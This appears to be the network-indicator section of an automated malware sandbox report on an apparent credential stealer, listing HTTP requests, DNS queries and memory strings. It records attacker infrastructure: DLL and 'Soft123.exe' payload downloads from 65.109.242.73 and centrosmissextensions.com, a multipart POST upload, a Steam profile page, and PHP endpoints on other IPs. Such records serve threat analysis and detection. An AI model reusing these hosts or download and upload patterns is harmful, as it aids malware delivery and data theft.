Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /Soft123.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: centrosmissextensions.comCache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: steamcommunity.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKKFCFBKFCFBFIDGCGDHUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 278Connection: Keep-AliveCache-Control: no-cache

Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.209.162.40/
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.209.162.40/apocalypseRussia
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://5.42.65.32/
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://5.42.65.32/CHECK.php
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://5.42.65.32/EOK.php
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://5.42.65.32/SOSORRY.php
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://5.42.65.32/TOKYO.php
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://fontawesome.iohttp://fontawesome.io/license/
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://fontawesome.iohttp://fontawesome.io/license/Copyright
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0H
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://schemas.fontawesome.io/icons/
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: http://www.freedesktop.org/standards/dbus/1.0/introspect.dtd
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2050716572.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: RegAsm.exe, 00000003.00000002.2047018875.000000001C3AD000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.3.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199673019888[1].htm.3.dr	String found in binary or memory: https://65.109.242.73
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.73/
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.73/freebl3.dll
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.73/mozglue.dll
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.73/msvcp140.dll
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.73/msvcp140.dllKD
Source: RegAsm.exe, 00000003.00000002.2042222099.000000000167F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.73/nss3.dll
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.73/softokn3.dll
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000514000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.73/sqln.dll
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.73/vcruntime140.dll
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.73/vcruntime140.dllfH
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.73/x5
Source: RegAsm.exe, 00000003.00000002.2039734186.00000000005F1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.730d7bece6afnt-Disposition:
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000558000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.73BGDAKK--
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000558000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.73BGDAKKg
Source: RegAsm.exe, 00000003.00000002.2039734186.00000000005F1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.73DAKK
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.73DBGC
Source: RegAsm.exe, 00000003.00000002.2039734186.00000000005F1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.73T
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000558000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.73t/form-data;
Source: BKEBFHIJ.3.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 76561199673019888[1].htm.3.dr	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: BKEBFHIJ.3.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://centrosmissextensions.com/
Source: RegAsm.exe, 00000003.00000002.2042222099.000000000162B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2042222099.000000000167F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://centrosmissextensions.com/Soft123.exe
Source: BKEBFHIJ.3.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BKEBFHIJ.3.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=96N66CvLHly8&a
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=Kg_v7CMM
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=6q6r
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=wC7D7_Fi9JOs&l=e
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=BMF068jICwP9&
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=1_BxDGVvfXwv&am
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: BKEBFHIJ.3.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BKEBFHIJ.3.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BKEBFHIJ.3.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://github.com/autofac/Autofac
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: https://github.com/tmds/Tmds.DBus
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr	String found in binary or memory: https://github.com/tmds/Tmds.DBus/
